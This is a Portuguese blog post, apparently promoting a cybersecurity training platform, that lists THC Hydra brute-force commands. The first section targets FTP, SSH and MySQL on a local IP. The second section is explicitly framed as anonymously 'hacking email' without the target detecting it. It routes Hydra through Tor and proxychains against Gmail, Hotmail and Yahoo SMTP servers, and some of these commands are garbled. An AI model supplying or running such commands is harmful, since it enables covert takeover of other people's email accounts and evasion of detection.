fbpx

Comandos e truques com THC Hydra

O THC Hydra é uma ferramenta que usa dicionário de força bruta para ataques e tentativas de várias combinações de senhas e logins contra um alvo.

Esta ferramenta de hacking também suporta um vasto conjunto de protocolos incluindo Mail (POP3, IMAP, etc.), bancos de dados, LDAP, SMB, VNC e SSH.

Então demonstraremos os principais truques que podemos fazer com essa ferramenta para a quebra de senhas e acesso remoto a um determinado sistema.

Vale lembrar que em nossa Plataforma de Treinamentos de Cibersegurança aprofundamos ainda mais esse assunto!

Primeiramente, é muito importante saber como utilizar o THC Hydra, isto é, como funcionam os comandos em si.

1. Comandos do Hydra

  • hydra –L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ftp
  • hydra –L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh
  • hydra –L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 mysql
  • hydra –l admin -P /tmp/wordlist.txt 192.168.0.101 ftp

Percebe-se que nos três primeiros exemplos acima, tem-se a execução do Hydra para fazer brute force nos serviços de ftp, ssh e mysql. Todavia, nos três exemplos anteriores não se sabe o usuário e nem a senha do serviço que se está atacando. Já no quarto exemplo já se sabe pelo menos o nome do usuário, admin.

2. Como Hackear Email em modo anônimo com o THC Hydra

Quando caro leitor aqui quiser hackear um sistema de email sem ser detectado pelo alvo, é sempre importante ter instalado um TOR no seu sistema. Se você utiliza Linux, dê o seguinte comando para instalar o TOR:

apt-get install tor

Depois disso, deve-se configurar o proxychains colocando as saídas das conexões para a porta 9050 (porta de saída do TOR). Aqui estamos partindo do ponto que o leitor saiba configurar o proxychains.

Após fazer todo o processo de configuração do proxychains, digita-se os seguintes comandos para o anonimato.

  • Para explorar Gmail
    proxychains hydra -l [email protected] -P password.lst -s 465 -S -v -V -t 1 s
    smtp.gmail.com
  • Para explorar Hotmail
    proxychains hydra -l teste@hotmail. com/[email protected] -P password.lst -s 587 -S
    -v -V -t 1 s smtp.live.com
  • Para explorar Yahoo
    proxychains hydra -l [email protected] -P password.lst -s 587 -S -v -V -t 1 s
    smtp.mail.yahoo.com

* Obs: É importante observar que o parâmetro -P maúsculo serve para que o atacante possa passar algum argumento, que neste caso seria uma lista de senha. Caso o a letra p fosse minúscula, a ferramenta iria gerar e testar bilhões de senhas e isso levaria muito tempo em um Pentest.

O hydra pode ser utilizado no terminal e de modo gráfico quanto no Linux utilizando o comando “sudo apt-get install hydra” quanto em outros sistemas operacionais.

Consulte e instale o hydra através do site: http://sectools.org/tool/hydra/